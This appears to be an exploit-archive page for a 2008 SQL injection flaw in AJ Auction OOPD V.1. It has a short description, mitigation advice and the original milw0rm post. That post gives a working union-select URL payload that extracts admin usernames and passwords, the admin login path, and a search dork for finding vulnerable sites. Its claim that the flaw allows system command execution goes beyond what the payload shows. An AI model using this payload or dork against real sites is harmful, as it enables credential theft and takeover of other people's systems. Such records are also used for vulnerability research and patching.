header-logo
Suggest Exploit
vendor:
AJ Auction OOPD
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AJ Auction OOPD
Affected Version From: V.1
Affected Version To: V.1
Patch Exists: NO
Related CWE: N/A
CPE: a:ajauctionpro:aj_auction_oopd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AJ Auction OOPD V.1 SQL Injection Vulnerability

AJ Auction OOPD V.1 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. An attacker can use this vulnerability to gain access to the application database and can also execute system level commands on the server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#########################################################
#
#    AJ Auction OOPD V.1  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#=========================================================
#    HomE script : http://www.ajauctionpro.com/ajhome.php
#     
#    Demo : http://www.ajauctionpro.com/auction_2008/v1/   
#    
#          DorK :  Powered By AJ Auction
#     
##########################################################

Exploit:   

http://localhost.com/[PaTs]/[PaTs]/?do=allcat&id=-1+union+select+concat(user_name,0x3a,password)+from+admin_users--


Admin login

admin/adminindex.php

################################################################################
#####################################( Greetz )#################################
#                                                                              #
#           tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA              #       
#                mos_chori / Rafi / FAHD / Iraq Hackers /                      #       
#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-19]